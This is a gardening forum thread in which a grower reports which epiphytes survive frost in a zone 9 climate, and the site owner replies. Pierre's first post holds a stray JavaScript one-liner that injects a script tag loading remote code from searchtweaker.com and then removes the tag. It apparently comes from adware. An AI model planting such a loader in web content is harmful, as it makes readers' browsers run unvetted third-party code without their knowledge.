Epiphyte tree

Epiphytes growing in trees of subtropical style garden plus photos of garden flora and fauna.

Forums

Forum Home > General Discussion > Going deeper into Epiphyte cultivation.

Pierre

As I told when introducing myself, I'm an old gardener but recently interested in Epiphytes.

My climate is less than very favourable for that : too dry and a bit too cold ( zone 9).

I used the canopee effect of camphor trees and hang pots on a dead trunk.

Some plants have already withstood bad Winters ( Asplenium antiguum, Epiphyllum, Bilbergia nutans and an hybrid,, a polypodium, and our native fern Dryopteris felis mas).

Last Spring I also tried on a cork board, Platycerium bifurcatum which withstood two times a quick -3°C. I think I'm fixing a new Platycerium directly on a trunk and shelter it if necessary, because it is so exotic for me.

I wonder how to show you some pictures, directly from my files ?

I had to catch it from a plant Forum where it was already published.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

--

January 17, 2014 at 5:32 AM Flag Quote & Reply

epitree
Site Owner

Thanks for posting Pierre. It is great to learn of other epiphyte growers experiences in different climatic conditions around the world. You are blazing a trail that I am sure many will follow in the future as your experiments in epiphyte hardiness will inspire others to grow the ones that are proven to be hardy in your climate.

I apologise for the fact that this forum is not set up for posting pictures. Please post your photos to the members garden pics album as I (and other members) would be very interested to see them.

January 17, 2014 at 2:20 PM Flag Quote & Reply

Pierre

I'll post new pictures to the members garden pics album.

--

January 22, 2014 at 8:26 AM Flag Quote & Reply

Pierre

I've tried more epiphytes.

Amongst them Platycerium bifurcatum looks like a winner and so do some Bromeliads..

I've even tried Aglaomorpha coronans, but minus 2 is probably its limit without damages.

A pity no more exchanges are done there;

Regards.

Pierre

--

August 23, 2015 at 2:41 AM Flag Quote & Reply

epitree
Site Owner

Hi Pierre good to hear you are having some succeses.  It is a struggle to grow epiphytes in colder areas.

Maurice.

August 30, 2015 at 12:49 AM Flag Quote & Reply

You must login to post.